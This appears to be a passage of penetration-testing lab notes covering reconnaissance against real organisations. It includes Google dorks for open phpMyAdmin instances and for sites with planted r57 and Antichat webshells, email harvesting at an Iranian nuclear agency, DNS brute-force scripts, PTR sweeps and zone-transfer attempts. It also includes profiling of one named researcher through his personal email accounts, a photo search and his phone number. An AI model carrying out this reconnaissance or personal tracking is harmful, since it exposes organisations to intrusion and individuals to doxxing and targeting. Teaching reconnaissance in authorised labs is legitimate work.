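    srv.bind((bind_addr, port))
    srv.listen(1)
    return srv


def receive_file(srv, dest_path):
    """Listener side (the BT box). Accept one connection, write everything that
    arrives to dest_path until the peer closes (EOF), return the SHA-256 hex digest."""
    digest = hashlib.sha256()
    with srv:
        conn, _peer = srv.accept()
    with conn, open(dest_path, "wb") as out:
        while True:
            chunk = conn.recv(65536)
            if not chunk:
                break
            out.write(chunk)
            digest.update(chunk)
    return digest.hexdigest()


def send_file(host, port, src_path):
    """Sender side (the Windows client). Stream src_path, then shut down the write
    side so the listener sees EOF; return the SHA-256 hex digest of what was sent."""
    digest = hashlib.sha256()
    with socket.create_connection((host, port), timeout=5) as s, open(src_path, "rb") as f:
        while True:
            chunk = f.read(65536)
            if not chunk:
                break
            digest.update(chunk)
            s.sendall(chunk)
        s.shutdown(socket.SHUT_WR)
    return digest.hexdigest()


def transfer_verified(src_path, dest_path):
    """Run both ends on localhost; return (digests_match, sender_digest)."""
    srv = listen_on()
    port = srv.getsockname()[1]
    result = {}
    rx = threading.Thread(target=lambda: result.update(rx=receive_file(srv, dest_path)))
    rx.start()
    result["tx"] = send_file("127.0.0.1", port, src_path)
    rx.join()
    return result["rx"] == result["tx"], result["tx"]


def demo():
    """Constructed input mirroring the slide: arq1.txt containing 'teste de transferencia'.
    Returns (digests_match, digest, received_bytes)."""
    with tempfile.TemporaryDirectory() as tmp:
        src = Path(tmp) / "arq1.txt"
        dst = Path(tmp) / "output.txt"
        src.write_bytes(b"teste de transferencia\n")
        ok, digest = transfer_verified(src, dst)
        return ok, digest, dst.read_bytes()


if __name__ == "__main__":
    print(demo())
```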
2. Google Search
Google search operators - check the site operator and the others
site:offensive-security.com - see how many web pages the domain has (indexed pages)
Videoconferencing software
intext:"Videoconference Management System" ext:htm
Open phpMyAdmin
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
Norton AV for gateways
inurl:"8003/Display?what="
MSN contacts
filetype:ctt "msn"
Kickstart
#kickstart filetype:cfg
#kickstart filetype:cfg site:gov.br
CAREFUL!!!!!!
Apache backdoor
intitle:r57 shell filetype:php
Site with a planted backdoor - antichat in the title
intitle:"Antichat Shell" "disable functions"
3. Google Search Social
Search aeoi.org.ir on its own in Google - look for emails
use theharvester.py (Python script on BT)
root@bt:~# cd /pentest/enumeration/theharvester/
root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d aeoi.org.ir -l 500 -b google
[-] Searching in Google:
Searching 0 results...
Searching 100 results...
Searching 200 results...
[+] Emails found:
-----------------
hkazemian@aeoi.org.ir
sjahmadi@aeoi.org.ir
smshirvani@aeoi.org.ir
mmostaedi@aeoi.org.ir
AA37120067@aeoi.org.ir
jrahighi@aeoi.org.ir
sabolhosseini@aeoi.org.ir
mghannadi@aeoi.org.ir
rd@aeoi.org.ir
Use hkazemian@aeoi.org.ir
he is a researcher and has a Yahoo email
use hkazemian@yahoo.com
See SPAG Zeolite
company address, contact phone number and another Gmail address
- look for a photo
use hosseinkazemian@gmail.com - looking for an apartment, see the phone number
Whois query
root@bt:~# whois checkpoint.com | more
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Server Name: CHECKPOINT.COM
IP Address: 216.200.241.66
Registrar: NETWORK SOLUTIONS, LLC.
Whois Server: whois.networksolutions.com
Referral URL: http://www.networksolutions.com/en_US/
Domain Name: CHECKPOINT.COM
Registrar: NETWORK SOLUTIONS, LLC.
Whois Server: whois.networksolutions.com
Referral URL: http://www.networksolutions.com/en_US/
Name Server: NS2.CHECKPOINT.COM
Name Server: NS6.CHECKPOINT.COM
Name Server: NS8.CHECKPOINT.COM
Name Server: NS9.CHECKPOINT.COM
Status: clientTransferProhibited
Updated Date: 30-may-2012
Creation Date: 29-mar-1994
Expiration Date: 30-mar-2018
Administrative Contact, Technical Contact:
Admin, DNS
hostmaster@CHECKPOINT.COM
Check Point Software Technologies Ltd.
3A Jabotinsky St.
Ramat-Gan, 52520
IL
+972-3-7534555 fax: +972-3-5759256
Record expires on 30-Mar-2018.
Record created on 29-Mar-1994.
Database last updated on 20-Jun-2012 22:30:44 EDT.
Domain servers in listed order:
NS2.CHECKPOINT.COM
NS6.CHECKPOINT.COM
NS8.CHECKPOINT.COM
NS9.CHECKPOINT.COM
206.184.151.195
194.29.32.199
216.228.148.29
194.29.38.64
Reverse whois query
root@bt:~# whois 216.200.241.66
#
# Query terms are ambiguous. The query is assumed to be:
# "n 216.200.241.66"
#
# Use "?" to get help.
#
#
# The following results may also be obtained via:
#
http://whois.arin.net/rest/nets;q=216.200.241.66?showDetails=true&showARIN=false&ext=netref2
#
CHECKPOINT SOFTWARE MFN-B655-216-200-241-64-28 (NET-216-200-241-64-1) 216.200.241.64 - 216.200.241.79
Abovenet Communications, Inc ABOVENET-5 (NET-216-200-0-0-1) 216.200.0.0 - 216.200.255.255
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
5. DNS
Manual queries
root@bt:~# nslookup www.checkpoint.com
Server:         172.16.49.2
Address:        172.16.49.2#53
Non-authoritative answer:
Name: www.checkpoint.com
Address: 216.200.241.66
Querying the domain's mail and name servers
root@bt:~# nslookup
> set type=mx
> checkpoint.com
Server:         172.16.49.2
Address:        172.16.49.2#53
Non-authoritative answer:
checkpoint.com mail exchanger = 12 sami.checkpoint.com.
checkpoint.com mail exchanger = 15 usmail-as.zonelabs.com.
Authoritative answers can be found from:
> set type=ns
> checkpoint.com
Server:         172.16.49.2
Address:        172.16.49.2#53
Non-authoritative answer:
checkpoint.com nameserver = ns2.checkpoint.com.
checkpoint.com nameserver = ns6.checkpoint.com.
checkpoint.com nameserver = ns8.checkpoint.com.
checkpoint.com nameserver = ns9.checkpoint.com.
checkpoint.com nameserver = ns1.checkpoint.com.
Authoritative answers can be found from:
>
- DNS Information Gathering
1- Forward lookup brute force (BF) - try to guess valid names
root@bt:~/lab_DNS# host www.checkpoint.com
www.checkpoint.com has address 216.200.241.66
www.checkpoint.com has IPv6 address 2620:0:2a01:2::1a10
root@bt:~/lab_DNS# host wwwwwwww.checkpoint.com
Host wwwwwwww.checkpoint.com not found: 3(NXDOMAIN)
root@bt:~/lab_DNS#
- use script_dns1.sh on BT for forward BF (no output manipulation)
root@bt:~/lab_DNS# more script_dns1.sh
#!/bin/bash
for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do
host $name.checkpoint.com
done
- use script_dns2.sh on BT for forward BF ("has address" lines only)
root@bt:~/lab_DNS# more script_dns2.sh
#!/bin/bash
for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do
host $name.checkpoint.com | grep "has address"
done
root@bt:~/lab_DNS# ./script_dns2.sh
forums.checkpoint.com has address 194.29.38.13
ftp.checkpoint.com has address 194.29.38.25
ftps.checkpoint.com has address 194.29.38.27
mailhost.checkpoint.com has address 194.29.32.199
cale.checkpoint.com has address 194.29.32.199
mx1.checkpoint.com has address 194.29.38.66
ns.checkpoint.com has address 194.29.32.199
ns1.checkpoint.com has address 208.185.174.140
ns2.checkpoint.com has address 208.185.174.141
register.checkpoint.com has address 194.29.38.35
search.us.checkpoint.com has address 209.87.209.207
smtp.checkpoint.com has address 194.29.34.68
www.checkpoint.com has address 216.200.241.66
www.checkpoint.com has address 216.200.241.66
root@bt:~/lab_DNS#
- use script_dns3.sh on BT for forward BF (IPs only)
root@bt:~/lab_DNS# more script_dns3.sh
#!/bin/bash
for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do
host $name.checkpoint.com | grep "has address" | cut -d" " -f4
done
root@bt:~/lab_DNS# ./script_dns3.sh
194.29.38.13
194.29.38.25
194.29.38.27
194.29.32.199
194.29.32.199
194.29.38.66
194.29.32.199
208.185.174.140
208.185.174.141
194.29.38.35
209.87.209.207
194.29.34.68
216.200.241.66
216.200.241.66
2- Reverse lookup BF
- Try reverse resolution
root@bt:~/lab_DNS# host 216.200.241.66
66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com.
root@bt:~/lab_DNS# for ip in $(seq 64 79); do host 216.200.241.$ip | grep "domain name pointer" ;done
64.241.200.216.in-addr.arpa domain name pointer 216.200.241.64.available.above.net.
65.241.200.216.in-addr.arpa domain name pointer lata-gw.us.checkpoint.com.
66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com.
67.241.200.216.in-addr.arpa domain name pointer garmin.us.checkpoint.com.
68.241.200.216.in-addr.arpa domain name pointer flanger.us.checkpoint.com.
69.241.200.216.in-addr.arpa domain name pointer gould.us.checkpoint.com.
70.241.200.216.in-addr.arpa domain name pointer franklin.us.checkpoint.com.
71.241.200.216.in-addr.arpa domain name pointer darwin.us.checkpoint.com.
72.241.200.216.in-addr.arpa domain name pointer artemis.us.checkpoint.com.
73.241.200.216.in-addr.arpa domain name pointer amadeus.us.checkpoint.com.
74.241.200.216.in-addr.arpa domain name pointer streamer.us.checkpoint.com.
75.241.200.216.in-addr.arpa domain name pointer lata1.us.checkpoint.com.
76.241.200.216.in-addr.arpa domain name pointer lata2.us.checkpoint.com.
77.241.200.216.in-addr.arpa domain name pointer davis1.us.checkpoint.com.
78.241.200.216.in-addr.arpa domain name pointer davis2.us.checkpoint.com.
79.241.200.216.in-addr.arpa domain name pointer 216.200.241.79.available.above.net.
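Added example, not from the lab: script_dns1/2/3.sh and the reverse-lookup loop above folded into one Python module. The lookup function is a parameter so the logic runs offline against a table constructed from the slides' output (fake_forward and fake_reverse are assumptions, not live DNS); it also inverts the result to show which names share one address, which the shell scripts leave to the eye.

```python
import socket
from collections import defaultdict

# Added example, not code from the lab: the forward brute force of script_dns1/2/3.sh
# and the "for ip in $(seq 64 79)" reverse sweep as one Python module. The lookup
# functions are parameters so the logic runs offline against a constructed table;
# the defaults ask the system resolver, as `host` does.


def system_forward(name):
    """IPv4 addresses for name (the 'has address' lines), [] on NXDOMAIN."""
    try:
        infos = socket.getaddrinfo(name, None, socket.AF_INET, socket.SOCK_STREAM)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def system_reverse(ip):
    """PTR name for ip (the 'domain name pointer' line), None if there is none."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None


def forward_bruteforce(domain, words, resolve=system_forward):
    """Try every word as a label under domain; return {fqdn: [ips]} for hits.
    Duplicate wordlist entries (the slide's output lists www twice) are tried once."""
    found = {}
    for word in dict.fromkeys(words):
        fqdn = f"{word}.{domain}"
        ips = resolve(fqdn)
        if ips:
            found[fqdn] = ips
    return found


def unique_ips(found):
    """script_dns3.sh's IP column without repeats, in numeric order."""
    ips = {ip for addrs in found.values() for ip in addrs}
    return sorted(ips, key=lambda ip: tuple(int(o) for o in ip.split(".")))


def hosts_by_ip(found):
    """Invert the result: names that share one address (on the slide mailhost,
    cale and ns all sit on 194.29.32.199) are usually one box with several roles."""
    shared = defaultdict(list)
    for fqdn, addrs in found.items():
        for ip in addrs:
            shared[ip].append(fqdn)
    return dict(shared)


def reverse_sweep(prefix, lo, hi, reverse=system_reverse):
    """PTR lookups for prefix.lo .. prefix.hi inclusive; returns {ip: name}."""
    names = {}
    for last in range(lo, hi + 1):
        ip = f"{prefix}.{last}"
        name = reverse(ip)
        if name:
            names[ip] = name
    return names


# Constructed lookup tables using values copied from the slides (not live DNS).
FAKE_FORWARD = {
    "www.checkpoint.com": ["216.200.241.66"],
    "ftp.checkpoint.com": ["194.29.38.25"],
    "mailhost.checkpoint.com": ["194.29.32.199"],
    "cale.checkpoint.com": ["194.29.32.199"],
    "ns.checkpoint.com": ["194.29.32.199"],
}
FAKE_REVERSE = {
    "216.200.241.65": "lata-gw.us.checkpoint.com",
    "216.200.241.66": "www.checkpoint.com",
}


def fake_forward(name):
    return FAKE_FORWARD.get(name, [])


def fake_reverse(ip):
    return FAKE_REVERSE.get(ip)


if __name__ == "__main__":
    words = ["www", "ftp", "mailhost", "cale", "ns", "wwwwwwww", "www"]
    found = forward_bruteforce("checkpoint.com", words, resolve=fake_forward)
    for fqdn, addrs in found.items():
        print(fqdn, "has address", " ".join(addrs))
    print(unique_ips(found))
    print(hosts_by_ip(found))
    print(reverse_sweep("216.200.241", 64, 67, reverse=fake_reverse))
```

Drop the resolve=/reverse= arguments to run it against real DNS with a wordlist such as the lab's dns.txt.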
3- Zone transfer
root@bt:~# host -t ns offensive-security.com
offensive-security.com name server ns4.no-ip.com.
offensive-security.com name server ns2.no-ip.com.
offensive-security.com name server ns1.no-ip.com.
offensive-security.com name server ns3.no-ip.com.
offensive-security.com name server ns5.no-ip.com.
root@bt:~# host -l offensive-security.com ns1.no-ip.com
; Transfer failed.
Using domain server:
Name: ns1.no-ip.com
Address: 204.16.255.55#53
Aliases:
Host offensive-security.com.localdomain not found: 9(NOTAUTH)
; Transfer failed.
- try with all the name servers (primary and secondaries)
- do the same with aeoi.org.ir and estacio.br
Use /pentest/enumeration/dnsenum
root@bt:/pentest/enumeration/dns/dnsenum# ls
dns-big.txt dnsenum.pl dns.txt README.txt
root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl estacio.br
estacio.br                      5      IN  A      200.216.152.71
Name Servers:
ns1.estacio.br                  5      IN  A      200.216.152.249
ns2.estacio.br                  5      IN  A      200.216.152.250
Mail (MX) Servers:
Mail.Global.FrontBridge.com     5      IN  A      216.32.180.22
Mail.Global.FrontBridge.com     5      IN  A      216.32.181.178
estacio.br                      1800   IN  TXT
estacio.br                      1800   IN  A      200.216.152.71
1989163337.estacio.br           1800   IN  CNAME
mail._domainkey.estacio.br      14400  IN  TXT
agenda.estacio.br               1800   IN  A      200.216.152.71
agendaconselho.estacio.br       1800   IN  A      200.216.152.71
aluno.estacio.br                1800   IN  MX
biblioteca.estacio.br           1800   IN  CNAME
bibliotecasonora.estacio.br     1800   IN  A      200.216.152.90
blogdopresidente.estacio.br     1800   IN  A      200.216.152.149
bquestoes.estacio.br            1800   IN  A      200.216.152.63
adm.bquestoes.estacio.br        1800   IN  A      200.216.152.62
provas.bquestoes.estacio.br     1800   IN  A      200.216.152.63